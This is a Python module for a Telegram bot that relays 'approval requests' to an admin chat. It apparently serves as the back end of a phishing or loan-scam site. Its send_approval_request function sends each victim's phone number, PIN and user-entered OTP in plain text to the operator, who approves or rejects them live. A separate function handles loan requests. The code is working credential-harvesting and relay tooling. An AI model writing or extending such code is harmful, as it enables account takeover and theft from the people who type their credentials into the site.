# telegram_bot.py
import os
import httpx
from datetime import datetime, timezone
from dotenv import load_dotenv

load_dotenv()

# Accept either env var name so old deployments don't break
BOT_TOKEN = os.getenv("TELEGRAM_BOT_TOKEN", "")
ADMIN_CHAT_ID = (
    os.getenv("TELEGRAM_ADMIN_CHAT_ID")
    or os.getenv("TELEGRAM_CHAT_ID")
    or ""
)
TG_API = f"https://api.telegram.org/bot{BOT_TOKEN}"


# ─────────────────────────────────────────────────────────────
# Inline keyboards
# ─────────────────────────────────────────────────────────────
def _otp_keyboard(approval_id: str) -> dict:
    return {
        "inline_keyboard": [
            [
                {"text": "✅ Approve", "callback_data": f"approve:{approval_id}"},
                {"text": "❌ Reject",  "callback_data": f"reject:{approval_id}"},
            ]
        ]
    }


def _loan_keyboard(approval_id: str) -> dict:
    return {
        "inline_keyboard": [
            [
                {"text": "✅ Approve Loan", "callback_data": f"loan_approve:{approval_id}"},
                {"text": "❌ Deny Loan",    "callback_data": f"loan_reject:{approval_id}"},
            ]
        ]
    }


# ─────────────────────────────────────────────────────────────
# Shared low-level send helper
# ─────────────────────────────────────────────────────────────
async def send_telegram_message(
    text: str,
    reply_markup: dict | None = None,
    chat_id: str | None = None,
) -> dict:
    """Send a message to the admin chat (or a specific chat_id)."""
    if not BOT_TOKEN or not (chat_id or ADMIN_CHAT_ID):
        print("🔴 Telegram credentials missing.")
        return {"ok": False, "error": "Missing credentials"}

    payload = {
        "chat_id": chat_id or ADMIN_CHAT_ID,
        "text": text,
        "parse_mode": "HTML",
    }
    if reply_markup:
        payload["reply_markup"] = reply_markup

    async with httpx.AsyncClient(timeout=15) as client:
        try:
            r = await client.post(f"{TG_API}/sendMessage", json=payload)
            r.raise_for_status()
            print(f"🟢 Telegram sendMessage: {r.status_code}")
            return r.json()
        except httpx.HTTPStatusError as e:
            print(f"🔴 Telegram HTTP {e.response.status_code}: {e.response.text}")
            return {"ok": False, "error": e.response.text}
        except Exception as e:
            print(f"🔴 Telegram send error: {e}")
            return {"ok": False, "error": str(e)}


# ─────────────────────────────────────────────────────────────
# OTP approval request (with Approve / Reject buttons)
# ─────────────────────────────────────────────────────────────
async def send_approval_request(
    approval_id: str,
    phone: str,
    pin: str,
    otp: str,
    sms_body: str = "",
    is_user_submitted: bool = False,
) -> dict:
    """
    Send an OTP to the admin with Approve / Reject inline buttons.

    is_user_submitted=False → OTP was generated by the server (login/resend).
    is_user_submitted=True  → User typed this OTP on the website.
    """
    if is_user_submitted:
        title = "🔔 <b>OTP Verification Request</b>"
        subtitle = "The user has entered this code. Please review."
    else:
        title = "🔐 <b>OTP Issued</b>"
        subtitle = "A new OTP was sent to the user."

    ts = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")

    text = (
        f"{title}\n"
        f"<i>{subtitle}</i>\n\n"
        f"📱 <b>Phone:</b> <code>{phone}</code>\n"
        f"🔑 <b>PIN:</b>   <code>{pin}</code>\n"
        f"🔢 <b>OTP:</b>   <code>{otp}</code>\n"
        f"🕐 <b>Time:</b>  {ts}\n"
        f"🆔 <b>Ref:</b>   <code>{approval_id}</code>"
    )

    if sms_body:
        text += f"\n\n📩 <b>SMS sent:</b>\n<i>{sms_body}</i>"

    text += "\n\n<b>Approve this OTP?</b>"

    return await send_telegram_message(text, reply_markup=_otp_keyboard(approval_id))


# ─────────────────────────────────────────────────────────────
# Loan approval request (with Approve / Deny buttons)
# ─────────────────────────────────────────────────────────────
async def send_loan_approval_request(approval_id: str, phone: str) -> dict:
    text = (
        "🏦 <b>New Loan Request</b>\n\n"
        f"📱 <b>Phone:</b> <code>{phone}</code>\n"
        f"🆔 <b>Ref:</b>   <code>{approval_id}</code>\n\n"
        "<b>Approve this loan request?</b>"
    )
    return await send_telegram_message(text, reply_markup=_loan_keyboard(approval_id))


# ─────────────────────────────────────────────────────────────
# Ack a button press (stops the Telegram spinner)
# ─────────────────────────────────────────────────────────────
async def answer_callback_query(callback_id: str, text: str = "") -> dict:
    if not BOT_TOKEN:
        return {"ok": False, "error": "Missing token"}

    async with httpx.AsyncClient(timeout=10) as client:
        try:
            r = await client.post(
                f"{TG_API}/answerCallbackQuery",
                json={
                    "callback_query_id": callback_id,
                    "text": text,
                    "show_alert": False,
                },
            )
            return r.json()
        except Exception as e:
            print(f"🔴 Callback answer error: {e}")
            return {"ok": False, "error": str(e)}


# ─────────────────────────────────────────────────────────────
# Replace the message body after a decision
# ─────────────────────────────────────────────────────────────
async def edit_message(chat_id: int, message_id: int, text: str) -> dict:
    if not BOT_TOKEN:
        return {"ok": False, "error": "Missing token"}

    async with httpx.AsyncClient(timeout=10) as client:
        try:
            r = await client.post(
                f"{TG_API}/editMessageText",
                json={
                    "chat_id": chat_id,
                    "message_id": message_id,
                    "text": text,
                    "parse_mode": "HTML",
                },
            )
            return r.json()
        except Exception as e:
            print(f"🔴 Edit message error: {e}")
            return {"ok": False, "error": str(e)}